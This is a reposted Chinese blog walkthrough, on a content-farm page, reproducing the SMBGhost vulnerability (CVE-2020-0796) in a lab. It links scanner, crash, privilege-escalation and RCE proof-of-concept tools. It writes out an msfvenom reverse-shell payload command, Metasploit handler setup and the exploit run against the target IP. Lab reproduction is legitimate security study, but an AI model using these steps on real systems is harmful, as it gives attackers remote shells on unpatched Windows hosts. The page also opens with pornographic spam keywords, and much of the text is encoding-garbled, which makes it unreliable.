日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2020-0796复现(poc+exp)

發(fā)布時間:2023/12/31 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2020-0796复现(poc+exp) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

文章目錄

  • 一、介紹
  • 二、影響版本
  • 三、測試環(huán)境
  • 四、漏洞檢測
    • 1、腳本
    • 2、驗證
  • 五、漏洞攻擊
    • 1、藍屏攻擊
      • (1)腳本
      • (2)驗證
    • 2、本地提權(quán)
      • (1)腳本
      • (2)驗證
    • 3、遠程攻擊
      • (1)腳本
      • (2)驗證
        • 0x01:在kali中使用msfvenom生成反彈的shellcode
        • 0x02:將生成的exp.py中的內(nèi)容覆蓋SMBGhost_RCE_PoC-master中exploit.py的內(nèi)容
        • 覆蓋后的exploit.py中USER_PAYLOAD的內(nèi)容如下
        • 0x03:打開msf,使用模塊本地監(jiān)聽4444端口
        • 0x04:執(zhí)行exploit.py文件
        • 0x05:kali接收shell

一、介紹

Microsoft服務(wù)器消息塊3.1.1(SMBv3)協(xié)議處理某些請求的方式中存在一個遠程代碼執(zhí)行漏洞,也就是"Windows SMBv3客戶端/服務(wù)器遠程代碼執(zhí)行漏洞"。

二、影響版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

三、測試環(huán)境

(1)靶機:172.16.20.162
環(huán)境:cn_windows_10_consumer_editions_version_1903_updated_sept_2019_x64_dvd_ef681fec.iso
注:使用靶機進行測試時需要關(guān)閉靶機防火墻
(2)攻擊機:172.16.20.1/172.16.20.128
環(huán)境:Windows/Kali

四、漏洞檢測

1、腳本

https://github.com/1stPeak/CVE-2020-0796-Scanner

2、驗證


五、漏洞攻擊

1、藍屏攻擊

(1)腳本

https://github.com/eerykitty/CVE-2020-0796-PoC
我使用的是python3版本,有些模塊需要安裝,可以使用腳本自動安裝,如下所示

py -3 setup.py install

如果有些無法模塊安裝,就一個一個的安裝,這是我需要安裝的,你們不一定一樣

cryptography six ntlm_auth pyasn1

使用以下命令進行安裝即可

pip3 install 模塊名

(2)驗證

2、本地提權(quán)

(1)腳本

https://github.com/danigargu/CVE-2020-0796/releases

(2)驗證

3、遠程攻擊

(1)腳本

https://github.com/chompie1337/SMBGhost_RCE_PoC

(2)驗證

0x01:在kali中使用msfvenom生成反彈的shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.20.128 lport=4444 -f py -o exp.py

0x02:將生成的exp.py中的內(nèi)容覆蓋SMBGhost_RCE_PoC-master中exploit.py的內(nèi)容

覆蓋后的exploit.py中USER_PAYLOAD的內(nèi)容如下

0x03:打開msf,使用模塊本地監(jiān)聽4444端口

msf6 > use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport 4444 set lhost 172.16.20.128 run


0x04:執(zhí)行exploit.py文件

py -3 exploit.py -ip 172.16.20.162

注意下方紅框中的xx,也可以輸入其他命令或字母,隨后kali就會接收到shell

0x05:kali接收shell


注:使用exploit.py是如果遇到報錯,可以關(guān)閉并重新打開kali的監(jiān)聽,然后重新執(zhí)行該exploit.py,或者直接多次重新執(zhí)行exploit.py,不能執(zhí)行了再重新打開監(jiān)聽,重新執(zhí)行exploit.py,多試幾次就OK了

總結(jié)

以上是生活随笔為你收集整理的CVE-2020-0796复现(poc+exp)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。